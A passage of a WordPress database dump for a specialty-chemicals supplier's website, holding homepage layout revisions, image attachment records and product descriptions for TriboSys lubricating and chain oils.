span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 18:25:21', '2016-09-13 18:25:21', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1630, 2, '2016-09-13 18:27:11', '2016-09-13 18:27:11', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="85"]\r\n\r\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\r\n\r\n\r\n[/text_box]\r\n[text_box]\r\n\r\n<h2>SINCE 1955</h2>\r\n\r\n[/text_box]\r\n[text_box position_y="20"]\r\n\r\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="KRYTOX™ & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n[text_box width="93" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col]\r\n\r\n[gap height="5px"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="4" align="0"]\r\n\r\n<h3>Technical Support</h3>\r\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Application Experts</h3>\r\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n<h3>Large Inventory</h3>\r\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\r\n\r\n[/col]\r\n\r\n[/row]\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\r\n\r\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\r\n\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n[divider]\r\n\r\n<h1><strong>ReleaSys </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1588" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1624"]\r\n\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 18:27:11', '2016-09-13 18:27:11', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1631, 2, '2016-09-13 18:45:59', '2016-09-13 18:45:59', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="5"]\n\n[button text="KRYTOX™ & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="5"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="5"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="5"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="5"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 18:45:59', '2016-09-13 18:45:59', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1632, 2, '2016-09-13 18:46:38', '2016-09-13 18:46:38', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="5"]\n\n[button text="KRYTOX™ & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="10"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="5"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="15"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="5"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-13 18:46:38', '2016-09-13 18:46:38', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1633, 2, '2016-09-13 18:51:48', '2016-09-13 18:51:48', '', 'plastic-metal-glass-cleaner', '', 'inherit', 'open', 'closed', '', 'plastic-metal-glass-cleaner-2', '', '', '2016-09-13 18:51:48', '2016-09-13 18:51:48', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/plastic-metal-glass-cleaner-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1634, 2, '2016-09-13 18:54:50', '2016-09-13 18:54:50', '', 'MS-530N Contact Re-Nu', '', 'inherit', 'open', 'closed', '', 'contact-cleaner', '', '', '2016-11-29 14:41:23', '2016-11-29 14:41:23', '', 1292, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/contact-cleaner.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1635, 2, '2016-09-13 18:57:14', '2016-09-13 18:57:14', '', 'contact-cleaner2', '', 'inherit', 'open', 'closed', '', 'contact-cleaner2', '', '', '2016-09-13 18:57:14', '2016-09-13 18:57:14', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/contact-cleaner2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1636, 2, '2016-09-13 19:00:00', '2016-09-13 19:00:00', '', 'flux-remover2', '', 'inherit', 'open', 'closed', '', 'flux-remover2', '', '', '2016-09-13 19:00:00', '2016-09-13 19:00:00', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/09/flux-remover2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (1637, 2, '2016-09-13 19:35:36', '2016-09-13 19:35:36', '<h3>TriboSys™ 211X | General Purpose Oils</h3>\r\nThese general purpose oils are designed for a wide range of general applications from small and medium sized gear drives, to bearings, cams, ways, pumps, chain baths, and slide configurations.\r\n\r\n<strong>TriboSys™ 2110</strong>\r\n\r\nThis  oil will out-wet and gives exceptionally long life, rust and corrosion protection for a variety of applications including circulating systems.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Non-Drip/Non-Foaming</li>\r\n 	<li>High V.I’s</li>\r\n 	<li>Increased Equipment Efficiency and Life</li>\r\n 	<li>Extra Non-Drip (END)</li>\r\n</ul>\r\n<strong>TriboSys™ 2111</strong>\r\n\r\nA semi-synthetic economical alternative to straight mineral oil lubricants. It has been proven to out-perform mineral oils in every important category. A true-multi-grade, multi-purpose oil designated for general plant-wide use.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Oxidation Resistant</li>\r\n 	<li>Anti-Wear and EP Film Strength</li>\r\n 	<li>Low Evaporation and Make-Up Rates</li>\r\n 	<li>Rust and Corrosion Protection, Non-Drip</li>\r\n 	<li>Reduced Consumption and Inventory</li>\r\n 	<li>Increased Equipment Efficiency</li>\r\n</ul>', 'TriboSys™  211X | General Purpose Oils', 'Designed for a wide range of general applications from small and medium sized gear drives, to bearings, cams, ways, pumps, chain baths, and slide configurations.', 'publish', 'open', 'closed', '', 'tribosys-211x-general-purpose-oils', '', '', '2016-12-21 18:36:57', '2016-12-21 18:36:57', '', 0, 'https://132.148.10.86/wordpress/?post_type=product&#038;p=1637', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1638, 2, '2016-09-13 19:40:02', '2016-09-13 19:40:02', '<h3>TriboSys™ 212X | High Temperature Chain Oils</h3>\r\nPowerful penetrating chain oils for applications where the lubricant penetrates to reach the pins and bushings located within roller chains. Additional applications include hinges, castors, rollers, bolts, screw assemblies, bushings and cable.\r\n\r\n<strong>2120</strong>\r\nThis chain oil exhibits excellent anti-wear characteristics and power savings through friction reduction. It is an ashless, smokeless product with no carbon, varnish or gummy residue at higher and continuous temperatures up to 525˚F/274˚C.\r\n\r\n<strong>2121</strong>\r\nA combination of synthetic oils and submicron molybdenum disulfide for maximum lubrication of all moving parts on all chain designs. The synthetic fluids have a powerful cleaning action that breaks down and dissolves prior carbon, varnish and gum buildup.\r\n\r\n<strong>Advantages</strong>\r\n<ul>\r\n 	<li>Energy Efficient</li>\r\n 	<li>Anti-Wear</li>\r\n 	<li>Ashless-No Residue</li>\r\n 	<li>Extends Chain and Track Life</li>\r\n</ul>\r\n<strong>Typical Applications</strong>\r\n<ul>\r\n 	<li>High Temperature Ovens</li>\r\n 	<li>Tunnels</li>\r\n 	<li><span style="font-size: 14.4px;">Reflow Ovens</span></li>\r\n 	<li>Dryers</li>\r\n 	<li>Tenter Frames</li>\r\n 	<li>Shrink Wrap Machines</li>\r\n 	<li>Textile Auxiliaries</li>\r\n 	<li>Steel</li>\r\n 	<li>Plastic</li>\r\n 	<li>Printing</li>\r\n 	<li>Woodworking Processes</li>\r\n</ul>\r\n&nbsp;', 'TriboSys™  212X | High Temperature Chain Oils', 'Powerful penetrating chain oils for applications where the lubricant penetrates to reach the pins and bushings located within roller chains. Additional applications include hinges, castors, rollers, bolts, screw assemblies, bushings and cables.', 'publish', 'open', 'closed', '', 'tribosys-212x-chain-oils', '', '', '2016-12-21 18:37:35', '2016-12-21 18:37:35', '', 0, 'https://132.148.10.86/wordpress/product/tribosys-212x/', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (1639, 2, '2016-12-21 18:31:31', '2016-12-21 18:31:31', 'TriboSys 211X | General Purpose Oils\n\n<strong>TriboSys™ 2110</strong>\n\nThis  oil will out-wet and gives exceptionally long life, rust and corrosion protection for a variety of applications including circulating systems.\n\n<strong>Advantages</strong>\n<ul>\n 	<li>Non-Drip/Non-Foaming</li>\n 	<li>High V.I’s</li>\n 	<li>Increased Equipment Efficiency and Life</li>\n 	<li>Extra Non-Drip (END)</li>\n</ul>\n<strong>TriboSys™ 2111</strong>\n\nA semi-synthetic economical alternative to straight mineral oil lubricants. It has been proven to out-perform mineral oils in every important category. A true-multi-grade, multi-purpose oil designated for general plant-wide use.\n\n<strong>Advantages</strong>\n<ul>\n 	<li>Oxidation Resistant</li>\n 	<li>Anti-Wear and EP Film Strength</li>\n 	<li>Low Evaporation and Make-Up Rates</li>\n 	<li>Rust and Corrosion Protection, Non-Drip</li>\n 	<li>Reduced Consumption and Inventory</li>\n 	<li>Increased Equipment Efficiency</li>\n</ul>', 'TriboSys 211X | General Purpose Oils', 'Designed for a wide range of general applications from small and medium sized gear drives, to bearings, cams, ways, pumps, chain baths, and slide configurations.', 'inherit', 'closed', 'closed', '', '1637-autosave-v1', '', '', '2016-12-21 18:31:31', '2016-12-21 18:31:31', '', 1637, 'https://132.148.10.86/wordpress/1637-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1640, 1, '2016-09-14 11:35:35', '2016-09-14 11:35:35', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="5"]\n\n[button text="KRYTOX™ & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="10"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="5"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="15"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-fade" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="5"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" width__sm="60" position_x="100" position_y="5"]\n\n[button text="EPOXY & CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n\n[/ux_banner_grid]\n[row]\n\n[col]\n\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="4" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="4"]\n\n<h3>Large Inventory</h3>\n<p>We are committed to ensuring that our customers can count on swift delivery and an uninterrupted supply chain.</p>\n\n[/col]\n\n[/row]\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n[divider]\n\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1588" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1624"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n\n[/row]\n[gap]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-09-14 11:35:35', '2016-09-14 11:35:35', '', 64, 'https://132.148.10.86/wordpress/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (1641, 1, '2016-09-14 11:37:46', '2016-09-14 11:37:46', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="85"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<h2>SINCE 1955</h2>\n\n[/text_box]\n[text_box position_y="20"]\n\n<p><H3><strong>Quality &amp; Service</strong></h3></p>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="503px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="100" position_y="5"]\n\n[button text="KRYTOX™ & LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="10"]\n\n[button text="SPECIALTY PRODUCTS & SOLVENTS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="284px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="5"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="15"]\n\n[button text="MEDICAL CHEMICALS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="322px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="5"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="80" hover="zoom-long" link="https://www.miller-stephenson.com/epoxy-and-coatings/"]\n\n[text_box width="93" 